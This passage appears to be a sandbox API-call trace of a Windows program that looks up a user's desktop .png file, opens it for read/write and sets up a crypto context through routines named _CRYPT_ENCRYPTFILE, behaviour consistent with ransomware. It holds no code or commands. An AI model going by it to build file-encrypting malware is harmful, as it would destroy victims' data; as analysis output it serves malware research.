PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0166.948] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0166.948] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0166.948] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0166.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0166.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a60 [0166.949] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0166.949] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.949] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0166.950] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0166.950] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0166.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0166.951] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0166.953] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\s1epd3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0166.953] FreeLibrary (hLibModule=0x75990000) returned 1 [0166.953] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0166.953] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0166.953] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0166.953] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0166.954] FreeLibrary (hLibModule=0x75990000) returned 1 [0166.954] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0166.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0166.955] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0166.955] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0166.955] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.955] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0166.955] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0166.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0166.955] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.955] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.955] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.955] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="s1epd3.png", cAlternateFileName="")) returned 0x90add8 [0166.957] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0166.957] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.991] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="s1epd3.png", cAlternateFileName="")) returned 0x90add8 [0166.992] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0166.992] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0166.993] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1epd3.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0166.993] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0166.993] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0166.993] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0166.994] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0166.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0166.994] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0166.994] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0166.994] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0166.994] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0166.994] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0166.994] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.994] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52e19210, ftCreationTime.dwHighDateTime=0x1d5df9a, ftLastAccessTime.dwLowDateTime=0x2f441200, ftLastAccessTime.dwHighDateTime=0x1d5dd75, ftLastWriteTime.dwLowDateTime=0x2f441200, ftLastWriteTime.dwHighDateTime=0x1d5dd75, nFileSizeHigh=0x0, nFileSizeLow=0x11488, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="s1epd3.png", cAlternateFileName="")) returned 0x90af58 [0166.994] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0166.994] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0166.994] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0166.994] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.994] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0166.994] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0166.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.995] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0166.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0166.995] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.995] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.995] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.995] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0166.995] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0166.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.995] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0166.996] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.996] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0166.996] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0166.997] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0166.997] 